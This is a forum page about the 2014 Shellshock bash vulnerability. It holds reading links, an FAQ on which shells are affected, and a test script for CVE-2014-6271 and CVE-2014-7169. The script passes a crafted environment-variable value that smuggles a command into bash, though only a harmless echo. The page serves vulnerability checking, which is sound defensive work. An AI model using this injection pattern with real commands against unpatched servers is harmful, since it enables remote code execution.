$ bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


service(staff) 2014/10/9 13:52

David Wheeler's investigation essay on Shellshock (2014/10/08)

Recommended reading => http://www.dwheeler.com/essays/shellshock.html
More further reading:
https://host-project.org/content/are-you-open-being-shell-shocked
http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
http://en.wikipedia.org/wiki/Shellshock
http://www.futuresouth.us/wordpress/?p=5 (Yahoo! suspected of having been compromised)



Most frequently asked Shellshock questions (ash, tcsh, csh, mksh)

Q: Does the shell (not bash!) on our such-and-such embedded box have this problem?
Ans1: => If the system uses a Busybox environment, then in theory there is no need to worry; the Busybox shell is "ash", which does not have this problem => http://en.wikipedia.org/wiki/Almquist_shell
Ans2: => If it is Android OS, then in theory there is no need to worry; Android uses "mksh" => http://www.all-things-android.com/content/mirbsd-korn-shell-android-shell
Ans3: ==> Others such as "csh" and "tcsh" are, generally speaking, NOT within the blast radius this time, unless you have specifically patched them; this bash bug is caused by a special function import/export feature, so other shells that lack this feature should in theory not be a concern.
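The one-line test in the first post and the FAQ above come down to the same question: does this particular shell binary import function definitions from its environment, and if it does, is the parser fixed? The script below is an added example, not code from this thread; it packages the thread's `env x='() { :;}; ...'` test as a function that can be pointed at any shell path (bash, ash, dash, mksh), and adds the commonly used follow-up check for CVE-2014-7169, the incomplete-fix bug named in the advisories quoted above. The function names, the scratch-directory approach and the shell paths in the final loop are assumptions for this example.

```shell
#!/bin/sh
# Added example, not code from the original thread: generalise the thread's
# one-line test so it can be pointed at any shell binary (bash, ash, dash,
# mksh ...) and also cover the incomplete-fix case, CVE-2014-7169.
# Function names and the shell paths in the final loop are assumptions.

# shellshock_probe SHELL_PATH
#   Prints a verdict and returns 0 (not affected), 1 (affected) or
#   2 (could not test).
shellshock_probe() {
    sh_bin="$1"
    [ -x "$sh_bin" ] || { echo "$sh_bin: not executable, skipped"; return 2; }

    # CVE-2014-6271: an exported variable whose value looks like a function
    # definition is parsed on start-up, and an affected bash also runs the
    # trailing command. A fixed bash, or a shell that never imports
    # functions from the environment (ash, dash, mksh, csh), prints only
    # "this is a test".
    out=$(env x='() { :;}; echo vulnerable' "$sh_bin" -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "$sh_bin: affected (CVE-2014-6271)"; return 1 ;;
    esac

    # CVE-2014-7169: the first fix left the parser in a bad state, so the
    # dangling ">" from the import is applied to the next command. On an
    # affected bash "echo date" becomes "date > echo", leaving a file named
    # "echo" in the working directory; run it in a scratch directory and
    # look for that file.
    scratch=$(mktemp -d) || { echo "$sh_bin: cannot create scratch dir"; return 2; }
    ( cd "$scratch" && env 'x=() { (a)=>\' "$sh_bin" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -s "$scratch/echo" ]; then
        rm -rf "$scratch"
        echo "$sh_bin: affected (CVE-2014-7169)"
        return 1
    fi
    rm -rf "$scratch"
    echo "$sh_bin: not affected"
    return 0
}

# Stand-alone run over shells that commonly sit behind /bin/sh and CGI
# scripts; the paths are assumptions, adjust them for the box being checked.
for candidate in /bin/sh /bin/bash /bin/dash /bin/ash /bin/mksh; do
    [ -x "$candidate" ] && shellshock_probe "$candidate" || true
done
```

Two caveats when using this on an embedded box: check the shell that the service actually executes (`readlink -f /bin/sh`, and whatever `system()` or a CGI handler resolves to), not just the interactive login shell; and a "not affected" verdict for ash or mksh only says those shells do not import functions, it says nothing about a bash binary that may also be installed somewhere on the same system.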





© Vovo2000.com Mobile Version 小哈手機版 2019